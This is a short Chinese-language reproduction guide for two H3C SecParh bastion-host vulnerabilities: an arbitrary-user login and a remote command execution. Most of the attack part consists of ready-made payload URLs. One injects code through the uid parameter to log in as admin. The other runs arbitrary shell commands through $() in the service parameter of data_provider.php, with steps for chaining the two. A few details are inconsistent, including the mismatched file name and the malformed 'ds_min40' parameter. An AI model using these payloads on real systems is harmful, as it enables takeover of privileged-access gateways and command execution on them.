H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
- 1.H3C SecParh堡垒机任意用户登录漏洞
- 1.1.漏洞描述
- 1.2.漏洞影响
- 1.3.漏洞复现
- 1.3.1.登录页面
- 1.3.2.构建URL
- 1.4.总结
- 2.H3C SecParh堡垒机远程命令执行漏洞
- 2.1.漏洞描述
- 2.2.漏洞影响
- 2.3.漏洞复现
- 2.3.1.登录页面
- 2.3.2.构建URL
- 2.4.总结
1.H3C SecParh堡垒机任意用户登录漏洞
1.1.漏洞描述
在H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞。
1.2.漏洞影响
H3C SecParh堡垒机
1.3.漏洞复现
1.3.1.登录页面
该漏洞版本的登录页面如下,2018年的。
1.3.2.构建URL
URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
1.4.总结
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。
2.H3C SecParh堡垒机远程命令执行漏洞
2.1.漏洞描述
H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。
2.2.漏洞影响
H3C SecParh堡垒机
2.3.漏洞复现
2.3.1.登录页面
该漏洞版本的登录页面如下,2018年的。
2.3.2.构建URL
URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true
需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
2.4.总结
我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。